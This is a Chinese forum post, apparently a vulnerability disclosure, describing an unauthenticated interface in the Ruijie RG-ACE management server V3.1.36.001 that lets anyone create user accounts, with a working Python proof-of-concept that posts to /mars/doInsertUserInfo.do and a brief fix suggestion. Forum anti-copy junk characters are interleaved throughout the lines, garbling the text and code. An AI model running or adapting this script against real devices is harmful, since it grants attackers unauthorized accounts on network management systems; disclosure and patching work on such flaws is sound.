找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2221|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
$ ?, |8 ?2 P$ w4 l
% s& u' L0 U6 N
+ S! W1 `% w! m: R, P$ Q; p测试的具体版本是
" G; @9 l. u7 Q1 ]/ D5 x; s产品名称: 锐捷应用控制引擎6 z& M* }  a) g$ z+ U& M( f1 z
版本号: 3.1.36.001 TC
0 H& m% S+ Z) h4 B3 P9 G3 `编译时间: 2011042917301 F$ |0 X3 w  T

9 X# W+ c" A0 v. A9 A2 f9 Y8 j! N" j& q4 W# s
漏洞证明:
# L; }# ]# ?( \3 e 4 z2 _3 n4 h8 l. q& D
, Y  z5 H' S% I% {

5 v  h& B  h4 y7 G9 K! q, v% d% v& o. o2 t) M- S9 M
0 i: v' }/ h7 R' Q+ p! x

( ^# F8 z( V  p8 w" [1 V执行脚本' P3 d4 }7 @, j! K9 k) M
#! /usr/bin/env python& j7 R( `& w: a+ J. @
#coding=gbk$ o# B( Y/ i  H5 ]; @8 d7 c: h! }( N
#RG-ACE管理服务器 V3.1.36.001& P9 J" G1 S& J4 F: Y/ j
import urllib2, urllib,cookielib' Z' }# J4 _5 O9 L: w( m/ v
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP/ B* \0 g3 ?- ^& G: O' @
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
% W, q2 v; E7 }; |' o/ w4 Dopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]6 r' `' ~" q2 ^8 u' A: n
post=(("event","userManager.doInsertUserInfo"),
! D- p4 @7 Y9 ~) i8 m: o7 n("useractionname","addButtonValue"),; f, o' ~; \( C8 j/ |1 b4 D- j
("useropermanager","userManager"),3 G8 o. u' v' q" f0 n. l  |
("userName","t"), #######账号自己加
4 }7 i* P$ _& Z; b("pwd","aaaaaa"),######密码自己加3 w7 m3 Z; R* v1 X# E5 G0 `% |4 @
("trueName","ad"),
( N( I1 u  V6 V("email",""),
) H/ X- B4 b: ?("mobilePhone",""),# R. M. C& p  k; X
("officePhone",""),
. I( M! w$ f4 e) G6 d1 ?("addr",""),, ?4 t/ o" }3 j8 H( i1 L
("submit","确定"))7 {4 |8 [% L" p, R, H
urllib2.install_opener(opener)# u8 n0 h* B$ `
p=urllib2.urlopen(url, urllib.urlencode(post)).read()& j( |" d9 @$ p; E/ v
print "Done"$ {9 [5 M, w% R- }, j. U

3 F3 S( D! L: e# ]1 m登录,连接设备* |( _" p( C6 U) k

9 ~' U5 d' B) \% t7 G
0 S3 @) Y. m  H' |1 L& {4 w
6 {7 N5 P9 T: |1 k( q0 v8 k
; v  f, i$ R) W* P0 P5 F8 l' ^8 m& {& \/ Y  m
默认的管理员admin权限更大点8 p4 k# A& |+ T2 A' g

- e! X! J% P9 \. ?0 W9 h
+ c& L  k0 D8 L  p3 [3 b4 R5 y- |2 f+ |! z) t

* G' {0 |# r" Q# `
( y7 G: `2 F4 ?1 V% n修复方案:9 h' o  e3 K* y- N) [, _+ M1 K
加强对接口的权限验证
6 k( s1 g$ G8 |! P: {) j+ g- R% f9 R% q% w% }8 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表